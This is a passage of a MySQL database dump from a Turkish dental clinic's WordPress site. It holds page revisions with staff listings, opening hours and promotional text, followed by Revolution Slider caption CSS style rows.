(6552, 1, '2018-08-01 15:25:42', '2018-08-01 12:25:42', '[vc_row height=\"large\"][vc_column width=\"1/3\"][us_person image=\"6550\" name=\"ZEKİ ERDOĞAN\" role=\"Kurucu - Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6539\" name=\"Uzm. Dr. Dt. AYŞEGÜL DALKIRAN ARSLAN\" role=\"Ortodontist\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6540\" name=\"DUYGU DEMİR\" role=\"Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][/vc_row][vc_row content_placement=\"middle\" height=\"auto\"][vc_column][us_separator type=\"fullwidth\" size=\"small\" thick=\"3\" text=\"Dental Asistanlarımız\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][us_person image=\"6546\" name=\"SEVİNÇ PEKBAK\" role=\"Asistan\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/4\"][us_person image=\"6545\" name=\"SONGÜL EVCİ\" role=\"Asistan\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/4\"][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'inherit', 'closed', 'closed', '', '1194-revision-v1', '', '', '2018-08-01 15:25:42', '2018-08-01 12:25:42', '', 1194, 'http://www.ze-dent.com/1194-revision-v1/', 0, 'revision', '', 0),
(6553, 1, '2018-08-01 15:26:24', '2018-08-01 12:26:24', '', 'anasayfa', '', 'inherit', 'closed', 'closed', '', 'anasayfa', '', '', '2018-08-01 15:26:24', '2018-08-01 12:26:24', '', 8, 'http://www.ze-dent.com/wp-content/uploads/2018/08/anasayfa.jpg', 0, 'attachment', 'image/jpeg', 0),
(6554, 1, '2018-08-01 15:26:36', '2018-08-01 12:26:36', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cuma 09:00 - 19:00\r\nCumartesi 09:00 - 17:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Diş Hekimi Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6553\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"5000\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-revision-v1', '', '', '2018-08-01 15:26:36', '2018-08-01 12:26:36', '', 8, 'http://www.ze-dent.com/8-revision-v1/', 0, 'revision', '', 0),
(6556, 1, '2018-11-30 18:55:45', '2018-11-30 15:55:45', '', 'zfav', '', 'inherit', 'closed', 'closed', '', 'zfav', '', '', '2018-11-30 18:55:45', '2018-11-30 15:55:45', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/11/zfav.png', 0, 'attachment', 'image/png', 0),
(6557, 1, '2018-11-30 18:55:48', '2018-11-30 15:55:48', '', 'zlogo', '', 'inherit', 'closed', 'closed', '', 'zlogo', '', '', '2018-11-30 18:55:48', '2018-11-30 15:55:48', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/11/zlogo.png', 0, 'attachment', 'image/png', 0);

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_revslider_css`
--

CREATE TABLE `zdenl_revslider_css` (
  `id` int(9) NOT NULL,
  `handle` text NOT NULL,
  `settings` longtext,
  `hover` longtext,
  `advanced` longtext,
  `params` longtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Tablo döküm verisi `zdenl_revslider_css`
--

INSERT INTO `zdenl_revslider_css` (`id`, `handle`, `settings`, `hover`, `advanced`, `params`) VALUES
(1, '.tp-caption.medium_grey', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\"}'),
(2, '.tp-caption.small_text', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(3, '.tp-caption.medium_text', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(4, '.tp-caption.large_text', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(5, '.tp-caption.very_large_text', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(6, '.tp-caption.very_big_white', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#000\"}'),
(7, '.tp-caption.very_big_black', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}', '{\"color\":\"#000\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#fff\"}'),
(8, '.tp-caption.modern_medium_fat', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}', '{\"color\":\"#000\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(9, '.tp-caption.modern_medium_fat_white', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(10, '.tp-caption.modern_medium_light', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}', '{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(11, '.tp-caption.modern_big_bluebg', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"letter-spacing\":\"0\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\"}'),
(12, '.tp-caption.modern_big_redbg', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"padding-top\":\"1px\",\"letter-spacing\":\"0\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\"}'),
(13, '.tp-caption.modern_small_text_dark', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}', '{\"color\":\"#555\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(14, '.tp-caption.boxshadow', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"},\"hover\":\"\"}', '[]'),
(15, '.tp-caption.black', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"color\":\"#000\"}'),
(16, '.tp-caption.noshadow', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '[]'),
(17, '.tp-caption.thinheadline_dark', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),
(18, '.tp-caption.thintext_dark', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),
(19, '.tp-caption.largeblackbg', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),
(20, '.tp-caption.largepinkbg', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),
(21, '.tp-caption.largewhitebg', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}', '{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),
(22, '.tp-caption.largegreenbg', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),
(23, '.tp-caption.excerpt', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"-1.5px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\"},\"hover\":\"\"}', '{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px 4px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}'),
(24, '.tp-caption.large_bold_grey', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(25, '.tp-caption.medium_thin_grey', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(26, '.tp-caption.small_thin_grey', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(27, '.tp-caption.lightgrey_divider', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\"},\"hover\":\"\"}', '{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),
(28, '.tp-caption.large_bold_darkblue', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(29, '.tp-caption.medium_bg_darkblue', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(30, '.tp-caption.medium_bold_red', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(31, '.tp-caption.medium_light_red', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(32, '.tp-caption.medium_bg_red', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(33, '.tp-caption.medium_bold_orange', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(34, '.tp-caption.medium_bg_orange', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(35, '.tp-caption.grassfloor', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"width\":\"4000px\",\"height\":\"150px\"},\"hover\":\"\"}', '{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),
(36, '.tp-caption.large_bold_white', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(37, '.tp-caption.medium_light_white', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(38, '.tp-caption.mediumlarge_light_white', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(39, '.tp-caption.mediumlarge_light_white_center', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(40, '.tp-caption.medium_bg_asbestos', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(41, '.tp-caption.medium_light_black', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(42, '.tp-caption.large_bold_black', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(43, '.tp-caption.mediumlarge_light_darkblue', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
